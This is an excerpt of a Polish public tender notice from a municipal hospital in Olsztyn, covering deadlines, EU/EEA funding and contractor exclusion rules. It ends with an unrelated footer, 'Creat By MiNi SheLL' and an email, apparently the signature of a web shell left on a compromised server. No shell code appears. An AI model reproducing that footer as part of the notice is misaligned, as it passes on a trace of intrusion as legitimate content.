<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 10:30, miejsce: Miejski Szpital Zespolony w Olsztynie
ul. Niepodległości 44
Sekretariat 
10-045  Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Inwestycja dofinansowana ze środków Mechanizmu Finansowego EOG 2009- 2014 i Norweskiego Mechanizmu Finansowego 2009-2014. Umowa nr 022/300/7/MF EOG NMF /2014/00/638/1065 w sprawie Projektu NR 300/07/13 pt. Poprawa opieki perinatalnej gwarancją zdrowia społeczności subregionu olsztyńskiego. 
2. Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem, że wniosek o wyjaśnienie treści specyfikacji istotnych warunków zamówienia  wpłynął do zamawiającego nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania ofert, tj. 
do 19 grudnia 2014 r. (art. 38 ust.1).
3. Zamawiający wyznacza termin na spotkanie z Wykonawcami na dzień 12 grudnia 2014 r. na godzinę 9:00  przy biurze Z-cy Dyrektora ds. Technicznych  (ul. Niepodległości 44). W trakcie spotkania będzie możliwość przeprowadzenie wizji lokalnej.
4. Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w   okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego  działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com